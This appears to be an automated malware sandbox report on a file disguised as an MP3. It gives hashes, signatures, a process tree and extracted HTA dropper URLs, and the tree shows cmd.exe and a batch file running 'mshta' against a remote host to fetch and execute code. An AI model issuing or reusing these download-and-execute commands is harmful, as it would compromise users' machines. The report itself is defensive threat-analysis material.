Analysis

  • max time kernel
    923s
  • max time network
    879s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags
    arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    19/08/2024, 05:54

General

  • Target

    She Say She Love Me.mp3

  • Size

    4.2MB

  • MD5

    37ab6a75bf6f5e9fe44fd7b304d6ebea

  • SHA1

    9e54b60d5926264866b726a1481423b1429a1b85

  • SHA256

    d2ab58a8be0005c2d8ee7290631c71b860e52b66efd5a27596374f12821e98cc

  • SHA512

    b04067b2fe5de3e9e48fdc9bcad067d8260e6c45e2b53b3630c2d663fc460ba7e82b1d900aa2b6fb28e5472685031a01d173c01e51c01158dad15a83d5af44b6

  • SSDEEP

    98304:vXRuJZshZJqw8Td0AvxxonMun4Dyai2qbN:vhuAh2bTbcnZn4DKN

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://192.168.1.132:9999/giHmh

Extracted

Language
hta
Source
URLs
hta.dropper

http://192.168.1.132:9999/r

Signatures

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 34 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Windows Media Player\wmplayer.exe
    "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\She Say She Love Me.mp3"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2612
    • C:\Program Files (x86)\Windows Media Player\setup_wm.exe
      "C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\She Say She Love Me.mp3"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1444
    • C:\Windows\SysWOW64\unregmp2.exe
      "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1440
      • C:\Windows\System32\unregmp2.exe
        "C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
        3⤵
        • Enumerates connected drives
        • Suspicious use of AdjustPrivilegeToken
        PID:4560
  • C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4624
    • C:\Windows\system32\mshta.exe
      mshta http://192.168.1.132:9999/giHmh
      2⤵
      PID:3596
  • C:\Windows\system32\werfault.exe
    werfault.exe /h /shared Global\d9ea50dde03b4f81ae90ce8d217c66f9 /t 920 /p 3596
    1⤵
    PID:1516
  • C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4180
    • C:\Windows\system32\mshta.exe
      mshta http://192.168.1.132:9999/r
      2⤵
      PID:992
  • C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\@.txt
    1⤵
    • Modifies registry class
    PID:1624
  • C:\Windows\system32\werfault.exe
    werfault.exe /h /shared Global\3fed34428b684a62b4e6514758cb2de1 /t 4148 /p 992
    1⤵
    PID:3800
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\@.bat" "
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4132
    • C:\Windows\system32\mshta.exe
      mshta http://192.168.1.132:9999/r
      2⤵
      PID:4576
  • C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\@.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:648
    • C:\Windows\system32\mshta.exe
      mshta http://192.168.1.132:9999/r
      2⤵
      PID:2052
  • C:\Windows\system32\werfault.exe
    werfault.exe /h /shared Global\7f887209d7ec4ce288b3b55013de398e /t 2040 /p 4576
    1⤵
    PID:4960

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

    Filesize
    256KB

    MD5
    f19cbc0fe6f95513f453d8c1d0bc0a43

    SHA1
    fe40eec93c9f2bbae036667757c786583a028592

    SHA256
    4360d972da47246e9f52a016a2f2c1a43e101cb10f7203f9ab489de34c50011f

    SHA512
    6ff6fe4cc24f6bf89c4ba432abe506c0c3ea54eda519ce5f8ba94ecf01148e5f6c05924a5fee483af043e7acde745b20f851f991f5d1fd291c715e7ccdf88541

  • C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

    Filesize
    9KB

    MD5
    7050d5ae8acfbe560fa11073fef8185d

    SHA1
    5bc38e77ff06785fe0aec5a345c4ccd15752560e

    SHA256
    cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

    SHA512
    a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

  • C:\Users\Admin\AppData\Local\Temp\wmsetup.log

    Filesize
    1KB

    MD5
    15b61357e242978ff51292c5adaf0a3d

    SHA1
    c2e8d97cbf95ecfd594d6dc1f54058e14eb1690e

    SHA256
    07e21f128786253bbc8c88851ef5fec93213ac0a207184095efb62a7dcdaafab

    SHA512
    3c667da7a477f2f1d2086375435b21be724cac02ec82c48a68eed21cb8289ab1753dddf3c9b2e3b7f6d3acd3df839f1f71028659c8b98ab41de2962a7ee91117